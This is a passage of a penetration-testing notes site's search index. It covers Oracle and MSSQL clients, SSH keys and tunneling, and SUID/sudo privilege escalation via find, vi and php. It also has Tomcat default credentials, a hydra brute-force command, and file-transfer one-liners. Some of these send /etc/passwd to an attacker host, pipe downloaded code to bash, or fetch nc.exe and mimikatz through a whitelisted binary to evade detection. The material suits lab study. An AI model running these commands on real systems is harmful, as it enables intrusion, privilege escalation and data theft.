versioned MySQL comment xforwardedfor.py Append a fake HTTP header 'X-Forwarded-For'","tags":["pentesting"]},{"location":"sqlplus/","title":"sqlplus - To connect and manage the Oracle RDBMS","text":"

    SQL Plus is a command-line tool that provides access to the Oracle RDBMS. SQLPlus enables you to:

    • Enter SQLPlus commands to configure the SQLPlus environment.
    • Startup and shutdown an Oracle database.
    • Connect to an Oracle database.
    • Enter and execute SQL commands and PL/SQL blocks.
    • Format and print query results.
    ","tags":["oracle tns","port 1521","tools"]},{"location":"sqlplus/#connect-to-oracle-database","title":"Connect to Oracle database","text":"

    If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

    sqlplus <username>/<password>@$ip/XE;\n

    In case of this error message ( sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory), there might be an issue with libraries. Possible solution:

    sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\";sudo ldconfig\n
    ","tags":["oracle tns","port 1521","tools"]},{"location":"sqlplus/#basic-commands","title":"Basic commands","text":"

    All commands from Oracle's documentation.

    # List all available tables in the current database\nselect table_name from all_tables;\n\n# Show the privileges of the current user\nselect * from user_role_privs;\n
    ","tags":["oracle tns","port 1521","tools"]},{"location":"sqsh/","title":"sqsh","text":"","tags":["database","cheat sheet","mssql"]},{"location":"sqsh/#installation","title":"Installation","text":"

    Pre-installed in Kali. Used to interact with MSSQL (Microsoft SQL Server) from Linux.

     # Connect to mssql server\n sqsh -S $IP -U username -P Password123 -h\n # -h: disable headers and footers for a cleaner look.\n\n# When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication.\nsqsh -S $ip -U .\\\\<username> -P 'MyPassword!' -h\n# For windows authentication we can use  SERVERNAME\\\\accountname or .\\\\accountname\n

    When connected to msSQL, all commands will be executed after the GO command.

    ","tags":["database","cheat sheet","mssql"]},{"location":"ssh-audit/","title":"ssh-audit","text":""},{"location":"ssh-audit/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/jtesta/ssh-audit.

    git clone https://github.com/jtesta/ssh-audit.git \n
    "},{"location":"ssh-audit/#basic-usage","title":"Basic usage","text":"
    ./ssh-audit.py $ip\n
    "},{"location":"ssh-for-github/","title":"SSH for github","text":""},{"location":"ssh-for-github/#how-to-configure-multiple-two-or-more-deploy-keys-for-different-private-github-repositories-on-the-same-computer-without-using-ssh-agent","title":"How to configure multiple two or more deploy keys for different private github repositories on the same computer without using ssh-agent","text":"

    Let's say I want to have a ssh key A for repo1 and ssh key b for repo2.

    1. Create a ssh pair keys for each repository
    ssh-keygen -t ed25519 -C \"your_email@example.com\"\n# ed25519 is the algorithm\n

    For the second key and the subsequent ones, you will need to specify a different name.

    • Private key should have permissions set to 600.
    • .ssh folder should have permissions set to 700.

    • Add your SSH keys to the ssh-agent. In my case

    # start the ssh-agent in the background\neval \"$(ssh-agent -s)\"\n\n# add your ssh private key to the ssh-agent.\nssh-add ~/.ssh/id_ed25519\n
    1. Add your ssh public keys as deploy keys in the Settings tab of repo1 and repo2 .

    2. Edit .git/config file in both repositories.

    # For repo1\n[remote \"origin\"]\n        url = \"ssh://git@repo1.github.com:username/repo1.git\"\n\n# For repo2\n[remote \"origin\"]\n        url = \"ssh://git@repo2.github.com:username/repo2.git\"\n
    1. For each repo set name and email
    # navigate to your repo1\ngit config user.name \"yourName1\"\ngit config user.email \"email1@domain.com\"\n\n# navigate to your repo2\ngit config user.name \"name2\"\ngit config user.email \"email2@domain.com\"\n
    1. Create a config file in .ssh to manage keys:
    # Default github account: username1\nHost github.com/username1\n   HostName github.com\n   IdentityFile ~/.ssh/username1_private_key\n   IdentitiesOnly yes\n\n# Other github account: username2\nHost github.com/username2\n   HostName github.com\n   IdentityFile ~/.ssh/username2_private_key\n   IdentitiesOnly yes\n
    1. Make sure you don't have all credentials cached in your ssh agent
    ssh-add -D\n
    1. Add new credentials to your ssh agent
    ssh-add ~/.ssh/username1_private_key\nssh-add ~/.ssh/username2_private_key\n
    1. See added keys
    ssh-add -l\n
    1. Test your conection
    ssh -T git@github.com\n
    "},{"location":"ssh-keys/","title":"SSH keys","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-keys/#read-access-to-ssh","title":"Read access to .ssh","text":"

    Having read access over the .ssh directory for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and we can copy it to our machine and use the -i flag to log in with it:

    vim id_rsa\nchmod 600 id_rsa\n# If ssh keys have lax permissions, i.e., maybe read by other people, the ssh server would prevent them from working.\nssh user@10.10.10.10 -i id_rsa\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-keys/#write-access-to-ssh","title":"Write access to .ssh","text":"

    Having write access over the .ssh directory for a specific user, we may place our public key in /home/user/.ssh/authorized_keys.

    But for this we need to have gained access first as that user. With this technique we obtain ssh access to the machine.

    # Generating a public private rsa key pair\nssh-keygen -f key\n

    This will give us two files:\u00a0key\u00a0(which we will use with\u00a0ssh -i) and\u00a0key.pub, which we will copy to the remote machine.

    Let us copy\u00a0key.pub, then on the remote machine, we will add it into\u00a0/root/.ssh/authorized_keys:

    ","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-tunneling/","title":"ssh tunneling","text":"

    title: SSH tunneling author: amandaguglieri TableOfContents: true draft:false

    "},{"location":"ssh-tunneling/#ssh-tunneling","title":"SSH tunneling","text":""},{"location":"ssh-tunneling/#local-port-forwarding","title":"Local port forwarding","text":"

    In this example we will use this tunneling as a way to access locally to a remote postgresql service:

    1. In the attacking machine:
    ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n
    1. In another terminal in the attacking machine:
    sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n
    "},{"location":"ssh-tunneling/#dynamic-port-forwarding","title":"Dynamic Port Forwarding","text":"

    Unlike local port forwarding and remote port forwarding, which use a specific local and remote port (earlier we used 1234 and 5432, for instance), dynamic port forwarding uses a single local port and dynamically assigns remote ports for each connection.

    To use dynamic port forwarding with SSH, you can use the ssh command with the -D option, followed by the local port, the remote host and port, and the remote SSH server. For example, the following command will forward traffic from the local port 1234 to the remote server on port 5432, where the PostgreSQL server is running:

    ssh UserNameInTheAttackedMachine@IPOfAttackedMachine -D 1234 \n# -f send the command to the shell's background right before executing it remotely\n# -N tells SSH not to execute any commands remotely.\n

    As you can see, this time around we speciify a single local port to which we will direct all the traffic needing forwarding.

    If we now try running the same psql command as before, we will get an error. That is because this time around we did not specify a target port for our traffic to be directed to, meaning psql is just sending traffic into the established local socket on port 1234, but never reaches the To make use of dynamic port forwarding, a tool such as proxychains is especially useful.

    In summary and as the name implies, proxychains can be used to tunnel a connection through multiple proxies; a use case for this could be increasing anonymity, as the origin of a connection would be significantl more difficult to trace.

    In our case, we would only tunnel through one such \"proxy\"; the target machine. The tool is pre-installed on most pentesting distributions (such as ParrotOS and Kali Linux ) and is highly customisable, featuring an array of strategies for tunneling, which can be tampered with in itis configuration file /etc/proxychains4.conf.

    The minimal changes that we have to make to the file for proxychains to work in our current use case is to:

    1. Ensure that strict_chain is not commented out; ( dynamic_chain and random_chain should be commented out)
    2. At the very bottom of the file, under [ProxyList], we specify the socks5 (or socks4 ) host and port that we used for our tunnel

    In our case, it would look something like this, as our tunnel is listening at localhost:1234. PostgreSQL service on the target machine.

    [ProxyList]\n# add proxy here ...\n# meanwile\n# defaults set to \"tor\"\n#socks4 127.0.0.1 9050\nsocks5 127.0.0.1 1234\n

    Having configured proxychains correctly, we can now connect to the PostgreSQL service on the target, as if we were on the target machine ourselves! This is done by prefixing whatever command we want to run with proxychains:

    proxychains psql -U NameOfUserOfAttackedMachine -h localhost -p 5432\n
    "},{"location":"sshpass/","title":"sshpass - A program to pass passwords in the command line to ssh","text":"

    sshpass is a program that allows us to pass passwords in the command line to ssh. This way we can automate the login process.

    ","tags":["tools"]},{"location":"sshpass/#installation","title":"Installation","text":"
    sudo apt install sshpass\n
    ","tags":["tools"]},{"location":"sshpass/#usage","title":"Usage","text":"
    sshpass -p 'thepasswordisthis' ssh user@IP\n
    ","tags":["tools"]},{"location":"sslyze/","title":"sslyze - A tool for scanning certificates","text":"

    Analyze the SSL/TLS configuration of a server by connecting to it, in order to ensure that it uses strong encryption settings (certificate, cipher suites, elliptic curves, etc.), and that it is not vulnerable to known TLS attacks (Heartbleed, ROBOT, OpenSSL CCS injection, etc.).

    ","tags":["pentesting","web pentesting"]},{"location":"sslyze/#installation","title":"Installation","text":"

    Preinstalled in kali.

    Download it from: https://github.com/nabla-c0d3/sslyze.

    ","tags":["pentesting","web pentesting"]},{"location":"sslyze/#basic-usage","title":"Basic usage","text":"
    sslyze --certinfo <DOMAIN>\n

    In order not to have false positive regarding hostname validation, use the domain (not IP).

    ","tags":["pentesting","web pentesting"]},{"location":"sublist3r/","title":"sublist3r - A subdomain enumerating tool","text":"

    Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. Easily blocked by Google.

    ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"sublist3r/#installation","title":"Installation","text":"
    git clone https://github.com/aboul3la/Sublist3r\ncd sublist3r\nsudo pip install -r requirements.txt\n
    ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"sublist3r/#usage","title":"Usage","text":"

    From sublist3r directory:

    python3 sublist3r.py -d example.com -o file.txt\n# -d: Specify the domain.\n# -o file.txt: It prints the results to a file\n# -b: Enable the bruteforce module. This built-in module relies on the names.txt wordlist. To find it, use: locate names.txt (you can edit it).\n\n# Select an engine for enumeration, for instance, google.\npython3 sublist3r.py -d example.com -e google\n
    ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"suid-binaries/","title":"Suid binaries","text":"

    Resources: https://gtfobins.github.io/ contains a list of commands and how they can be exploited through \"sudo\".

    Equivalent to suid binaries in Windows would be: LOLBAS

    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#most-used-by-me","title":"Most used (by me)","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#find","title":"find","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#shell","title":"Shell","text":"

    It can be used to break out from restricted environments by spawning an interactive system shell.

    find . -exec /bin/sh \\; -quit\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#suid","title":"SUID","text":"

    If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

    This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

    sudo install -m =xs $(which find) .\n\n./find . -exec /bin/sh -p \\; -quit\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo","title":"Sudo","text":"

    If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    sudo find . -exec /bin/sh \\; -quit\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#vi","title":"vi","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#shell_1","title":"Shell","text":"

    It can be used to break out from restricted environments by spawning an interactive system shell.

    #one way\nvi -c ':!/bin/sh' /dev/null\n\n# another way\nvi\n:set shell=/bin/sh\n:shell\n
    Used at HTB machine Vaccine.

    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo_1","title":"Sudo","text":"

    If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    sudo vi -c ':!/bin/sh' /dev/null\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#php","title":"php","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo_2","title":"Sudo","text":"

    If the binary is allowed to run as superuser by\u00a0sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    • CMD=\"/bin/sh\" sudo php -r \"system('$CMD');\"
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"sys-internals-suite/","title":"SysInternals Suite","text":"

    To download: https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite.

    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#tpcview","title":"TPCView","text":"

    Application that allows you to see incoming and outcoming network connections associated to their application.

    In the course \"Mastering Thick Application Pentesting\" this is really helpfil to check the conections of the vulnerable applicaiton DVTA.

    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#process-monitor","title":"Process Monitor","text":"

    This tools helps us understand File System changes and what is being accessed in the file system.

    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#strings","title":"Strings","text":"

    It's similar to the command \"strings\" in bash. It displays all the human readable strings in a binary. Usage:

    strings.exe <binaryFile>\n
    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#sigcheck","title":"Sigcheck","text":"

    Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains.

    .\\sigcheck.exe -nobanner -s -e <folder/binaryFile>\n# -s: Search recursively, useful for thick client apps with lot of folders and subfolders\n# -e: Scan executable images only (regardless of their extension)\n# -nobanner:    Do not display the startup banner and copyright message.\n
    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#psexec","title":"PsExec","text":"

    PsExec\u00a0is a tool that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.

    ","tags":["windows","thick applications"]},{"location":"tcpdump/","title":"tcpdump - A\u00a0command-line packet analyzer","text":"

    It dumps all tcp connections from a .pcap file. Also tcpdump prints out a description of the contents of packets on a network interface that match the Boolean expression

    ","tags":["pentesting","reconnaissance"]},{"location":"tcpdump/#installation","title":"Installation","text":"

    https://www.tcpdump.org/

    ","tags":["pentesting","reconnaissance"]},{"location":"tcpdump/#usage","title":"Usage","text":"
    tcpdump -nntttAr <nameOfFile.pcap> \n\n# Exit after receiving count packets.\n-c count\n\n# Save the packet data to a file for later analysis\n-w \n\n# Read  from  a saved  packet  file\n-r\n\n# Print out all captured packages\n-A\n
    ","tags":["pentesting","reconnaissance"]},{"location":"the-harvester/","title":"The Harvester - A tool for pasive and active reconnaissance","text":"

    The Harvester: simple-to-use yet powerful and effective tool for early-stage penetration testing and red team engagements. We can use it to gather information to help identify a company's attack surface. The tool collects emails, names, subdomains, IP addresses, and URLs from various public data sources for passive information gathering. It has modules.

    Automate the modules we want to launch:

    1. Create a list of sources, one per line, sources.txt.

    2. Execute:

     cat sources.txt | while read source; do theHarvester -d \"${TARGET}\" -b $source -f \"${source}_${TARGET}\";done\n

    3. When the process finishes, extract all the subdomains found and sort them:

    cat *.json | jq -r '.hosts[]' 2>/dev/null | cut -d':' -f 1 | sort -u > \"${TARGET}_theHarvester.txt\"\n

    4. Merge all the passive reconnaissance files:

    cat facebook.com_*.txt | sort -u > facebook.com_subdomains_passive.txt\n$ cat facebook.com_subdomains_passive.txt | wc -l\n
    ","tags":["pentesting","reconnaissance","tools"]},{"location":"tmux/","title":"Tmux - A terminal multiplexer","text":"","tags":["pentesting","terminal","shells"]},{"location":"tmux/#installation","title":"Installation","text":"
    sudo apt install tmux -y\n
    ","tags":["pentesting","terminal","shells"]},{"location":"tmux/#basic-usage","title":"Basic usage","text":"

    start new:

    tmux\n

    start new with session name:

    tmux new -s myname\n

    attach:

    tmux a  #  (or at, or attach)\n

    attach to named:

    tmux a -t myname\n

    list sessions:

    tmux ls\n

    kill session:

    tmux kill-session -t myname\n

    Kill all the tmux sessions:

    tmux ls | grep : | cut -d. -f1 | awk '{print substr($1, 0, length($1)-1)}' | xargs kill\n

    In tmux, hit the prefix ctrl+b (my modified prefix is ctrl+a) and then:

    List all shortcuts

    ","tags":["pentesting","terminal","shells"]},{"location":"tomcat-pentesting/","title":"Pentesting tomcat","text":"

    Usually found on port 8080.

    Default credentials:

    admin:admin\ntomcat:tomcat\nadmin:<NOTHING>\nadmin:s3cr3t\ntomcat:s3cr3t\nadmin:tomcat\ntomcat:tomca\n

    Dictionaries:

    ","tags":["web pentesting","techniques"]},{"location":"tomcat-pentesting/#directory-enumeration","title":"Directory enumeration","text":"","tags":["web pentesting","techniques"]},{"location":"tomcat-pentesting/#brute-force","title":"Brute force","text":"
    hydra -l tomcat -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt -f $ip http-get /manager/html \n
    ","tags":["web pentesting","techniques"]},{"location":"transferring-files-evading-detection/","title":"Evading detection in file transfers","text":"","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-evading-detection/#changing-user-agent","title":"Changing User Agent","text":"

    Request with Invoke-WebRequest and Chrome User agent

    Listing user agents:

    [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label=\"User Agent\";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl\n
    Name       : InternetExplorer\nUser Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)\n\nName       : FireFox\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0\n\nName       : Chrome\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0\n             Safari/534.6\n\nName       : Opera\nUser Agent : Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1\n\nName       : Safari\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0\n             Safari/533.16\n

    Using Chrome User Agent:

    Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile \"C:\\Users\\Public\\nc.exe\"\n
    nc -lvnp 80\n
    ","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-evading-detection/#lolbas-gtfobins","title":"LOLBAS / GTFOBins","text":"

    Application whitelisting may prevent you from using PowerShell or Netcat, and command-line logging may alert defenders to your presence. In this case, an option may be to use a \"LOLBIN\" (living off the land binary), alternatively also known as \"misplaced trust binaries.\" An example LOLBIN is the Intel Graphics Driver for Windows 10 (GfxDownloadWrapper.exe), installed on some systems and contains functionality to download configuration files periodically. This download functionality can be invoked as follows:

    GfxDownloadWrapper.exe \"http://10.10.10.132/mimikatz.exe\" \"C:\\Temp\\nc.exe\"\n

    Such a binary might be permitted to run by application whitelisting and be excluded from alerting.

    ","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/","title":"Transferring files with code","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python","title":"Python","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python2-download","title":"python2 Download","text":"
    python2.7 -c 'import urllib;urllib.urlretrieve (\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python-3-download","title":"Python 3 - Download","text":"
    python3 -c 'import urllib.request;urllib.request.urlretrieve(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#upload-operations-using-python3","title":"Upload Operations using Python3","text":"

    uploadserver

    # Start the Python uploadserver Module\npython3 -m uploadserver \n\n# Uploading a File Using a Python One-liner\npython3 -c whet'import requests;requests.post(\"http://192.168.49.128:8000/upload\",files={\"files\":open(\"/etc/passwd\",\"rb\")})'\n

    htb-student | Password:HTB_@cademy_stdnt!)

    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php","title":"PHP","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-with-file_get_contents","title":"PHP Download with File_get_contents()","text":"
    # PHP file_get_contents() module to download content from a website combined with the file_put_contents() module to save the file into a directory. PHP can be used to run one-liners from an operating system command line using the option -r.\nphp -r '$file = file_get_contents(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\"); file_put_contents(\"LinEnum.sh\",$file);'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-with-fopen","title":"PHP Download with Fopen()","text":"
    php -r 'const BUFFER = 1024; $fremote = \nfopen(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"rb\"); $flocal = fopen(\"LinEnum.sh\", \"wb\"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-a-file-and-pipe-it-to-bash","title":"PHP Download a File and Pipe it to Bash","text":"
    php -r '$lines = @file(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\"); foreach ($lines as $line_num => $line) { echo $line; }' | bash\n# The URL can be used as a filename with the @file function if the fopen wrappers have been enabled. \n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#ruby","title":"Ruby","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file","title":"Download a File","text":"
    ruby -e 'require \"net/http\"; File.write(\"LinEnum.sh\", Net::HTTP.get(URI.parse(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\")))'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#perl","title":"Perl","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file_1","title":"Download a File","text":"
    perl -e 'use LWP::Simple; getstore(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\");'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#javascript","title":"JavaScript","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file-with-wgetjs","title":"Download a file with wget.js","text":"

    wget.js content:

    var WinHttpReq = new ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");\nWinHttpReq.Open(\"GET\", WScript.Arguments(0), /*async=*/false);\nWinHttpReq.Send();\nBinStream = new ActiveXObject(\"ADODB.Stream\");\nBinStream.Type = 1;\nBinStream.Open();\nBinStream.Write(WinHttpReq.ResponseBody);\nBinStream.SaveToFile(WScript.Arguments(1));\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file-using-javascript-and-cscriptexe","title":"Download a File Using JavaScript and cscript.exe","text":"

    Console Based Script Host from Microsoft Corporation belonging to Microsoft (r) Windows Script Host.

    cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#vbscript","title":"VBScript","text":"

    VBScript (\"Microsoft Visual Basic Scripting Edition\") is an Active Scripting language developed by Microsoft that is modeled on Visual Basic.

    We'll create a file called wget.vbs and save the following content:

    dim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\")\ndim bStrm: Set bStrm = createobject(\"Adodb.Stream\")\nxHttp.Open \"GET\", WScript.Arguments.Item(0), False\nxHttp.Send\n\nwith bStrm\n    .type = 1\n    .open\n    .write xHttp.responseBody\n    .savetofile WScript.Arguments.Item(1), 2\nend with\n

    Now, download a File Using VBScript and cscript.exe

    cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#netcat","title":"Netcat","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#printing-information-on-screen","title":"Printing information on screen","text":"

    On the server side (attacking machine):

    #data will be printed on screen\nnc -lvp <port>  \n

    On the client side (victim's machine):

    echo \u201chello\u201d | nc -v $ip <port>\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#transfer-data-and-save-it-in-a-file-with-netcat","title":"Transfer data and save it in a file with netcat","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#victims-machine-listening-on-port","title":"Victim's Machine listening on <Port>","text":"

    On the client side (victim's machine):

    nc -lvp <port> --recv-only > received.txt  \n# --recv-only: to close the connection once the file transfer is finished.\n

    On the server side (attacking machine):

    # Data will be stored in reveived.txt file.\ncat tobesentfile.txt | nc -v $ip <port>\n# The option -q 0 will tell Netcat to close the connection once it finishes. \n\n# Alternative:\nnc -q 0 $ipVictim <port> < tobesentfile.txt \n\nncat --send-only $ipVictim <port> < tobesentfile.txt \n# The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted.\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#victims-machine-connects-to-netcat-only-to-receive-the-file","title":"Victim's machine connects to netcat only to receive the file","text":"

    Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there's a firewall blocking inbound connections. Let's listen on port 443 on our Pwnbox and send the file SharpKatz.exe as input to Netcat.

    On the server side (attacking machine):

    sudo nc -l -p 443 -q 0 < tobesentfile.txt\n\nncat -l -p 443 --send-only < tobesentfile.txt\n

    On the client side (victim's machine): Compromised Machine Connect to Netcat to Receive the File

    nc $ipAttacker 443 > tobesentfile.txt\n\nncat $ipAttacker 443 --recv-only > tobesentfile.txt\n\n# Using /dev/tcp to Receive the File\ncat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#powershell-session-file-transfer","title":"PowerShell Session File Transfer","text":"

    PowerShell Remoting uses Windows Remote Management (WinRM), which is the Microsoft implementation of the Web Services for Management (WS-Management) protocol, to allow users to run PowerShell commands on remote computers.

    To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the Remote Management Users group, or have explicit permissions for PowerShell Remoting in the session configuration.

    Let's create an example and transfer a file from DC01 to DATABASE01 and vice versa.

    PS C:\\htb> whoami\n\nhtb\\administrator\n\nPS C:\\htb> hostname\n\nDC01\n
    Test-NetConnection -ComputerName DATABASE01 -Port 5985\n\nComputerName     : DATABASE01\nRemoteAddress    : 192.168.1.101\nRemotePort       : 5985\nInterfaceAlias   : Ethernet0\nSourceAddress    : 192.168.1.100\nTcpTestSucceeded : True\n

    Because this session already has privileges over DATABASE01, we don't need to specify credentials.

    Create a PowerShell Remoting Session to DATABASE01

    PS C:\\htb> $Session = New-PSSession -ComputerName DATABASE01\n

    We can use the Copy-Item cmdlet to copy a file from our local machine DC01 to the DATABASE01 session we have $Session or vice versa.

    Copy samplefile.txt from our Localhost to the DATABASE01 Session

    PS C:\\htb> Copy-Item -Path C:\\samplefile.txt -ToSession $Session -Destination C:\\Users\\Administrator\\Desktop\\\n

    Copy DATABASE.txt from DATABASE01 Session to our Localhost

    PS C:\\htb> Copy-Item -Path \"C:\\Users\\Administrator\\Desktop\\DATABASE.txt\" -Destination C:\\ -FromSession $Session\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#rdp","title":"RDP","text":"

    RDP (Remote Desktop Protocol) is commonly used in Windows networks for remote access.

    We can use xfreerdp or rdesktop to download a file by mounting a linux folder. This shared will allow us to transfer files to and from the RDP session.

    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#mounting-a-linux-folder-using-rdesktop","title":"Mounting a Linux Folder Using rdesktop","text":"
    rdesktop $ipVictim -d <domain> -u <username> -p <'Password0@'> -r disk:linux=\"/home/user/rdesktop/files\"\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#mounting-a-linux-folder-using-xfreerdp","title":"Mounting a Linux Folder Using xfreerdp","text":"

    bash xfreerdp /v:ipVictim /d:<domain> /u:<username> /p:<'Password0@'> /drive:linux,/home/plaintext/htb/academy/filetransfer

    To access the directory, we can connect to \\tsclient\\ in Windows, allowing us to transfer files to and from the RDP session.

